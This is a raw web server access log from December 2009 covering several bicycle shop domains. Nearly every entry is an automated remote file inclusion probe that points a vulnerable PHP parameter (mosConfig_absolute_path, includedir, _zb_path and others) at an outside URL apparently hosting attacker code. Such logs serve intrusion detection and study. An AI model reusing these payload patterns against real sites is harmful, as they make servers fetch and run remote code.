174.120.234.175 - - [12/Dec/2009:14:31:57 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:34:13 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:34:14 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:34:14 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:14:35:47 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:28 -0800] "GET /appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:29 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:32 -0800] "GET /appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:32 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.104 - - [12/Dec/2009:14:45:33 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.nbcc.ac.th/log/old?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:48:36 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:14:50:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:14:50:41 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:14:50:41 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:14:50:42 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.44 - - [12/Dec/2009:14:52:53 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; YPC 3.2.0; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4; IEMB3)" "www.svbikes.com"
64.62.128.254 - - [12/Dec/2009:14:56:28 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
64.62.128.254 - - [12/Dec/2009:14:56:29 -0800] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
64.62.128.254 - - [12/Dec/2009:14:56:29 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:14:57:31 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:57:31 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:14:57:32 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:02:21 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:15:02:21 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:15:02:21 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:15:02:57 -0800] "GET /logs/scripts.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:15:02:57 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.142.213.4 - - [12/Dec/2009:15:02:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.252.206 - - [12/Dec/2009:15:03:47 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:03:47 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:03:47 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:05:58 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:05:58 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:05:58 -0800] "GET /logs/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.52.245.146 - - [12/Dec/2009:15:06:24 -0800] "GET /riderready/index.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "svbikes.com"
204.13.165.203 - - [12/Dec/2009:15:06:45 -0800] "GET /logs/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:06:45 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:06:45 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:06:58 -0800] "GET /logs/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:06:59 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:06:59 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:12:06 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:15:12:19 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.62.128.254 - - [12/Dec/2009:15:12:19 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:15:32 -0800] "GET /logs/scripts.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
193.47.80.45 - - [12/Dec/2009:15:15:58 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
91.142.213.4 - - [12/Dec/2009:15:17:15 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:17:15 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:17:20 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:18:06 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.13.165.203 - - [12/Dec/2009:15:19:13 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:26:36 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:26:36 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:26:36 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:27:20 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:27:20 -0800] "GET /logs/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:27:20 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:29:48 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:29:48 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:29:48 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:30:05 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:30:05 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:30:05 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:30:47 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:30:47 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:30:47 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:31:59 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:31:59 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:32:00 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.252.206 - - [12/Dec/2009:15:35:15 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.142.213.4 - - [12/Dec/2009:15:35:47 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:38:23 -0800] "GET /logs/access.log//?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:38:23 -0800] "GET /?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:38:23 -0800] "GET /logs//?_zb_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:40:02 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.111.95.42 - - [12/Dec/2009:15:40:04 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:40:34 -0800] "GET /skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:40:34 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:40:35 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:15:44:13 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:15:44:13 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [12/Dec/2009:15:44:13 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:45:14 -0800] "GET /send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:45:14 -0800] "GET /logs/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:45:15 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:49:25 -0800] "GET /skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:49:25 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.29.2 - - [12/Dec/2009:15:49:25 -0800] "GET /logs/access.log%20%20/skin/zero_vote/login.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
117.74.98.18 - - [12/Dec/2009:15:53:35 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://www.calvarykoreanschool.org/images/turn1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:55:57 -0800] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:55:57 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:55:57 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:01 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:01 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:01 -0800] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:30 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:30 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:56:30 -0800] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:57:27 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:57:27 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:09 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:09 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:09 -0800] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:58 -0800] "GET /skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:58 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.111.74 - - [12/Dec/2009:15:58:58 -0800] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.90 - - [12/Dec/2009:16:12:51 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "houstonbikeshop.com"
80.93.58.162 - - [12/Dec/2009:16:17:18 -0800] "GET /logs/access.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
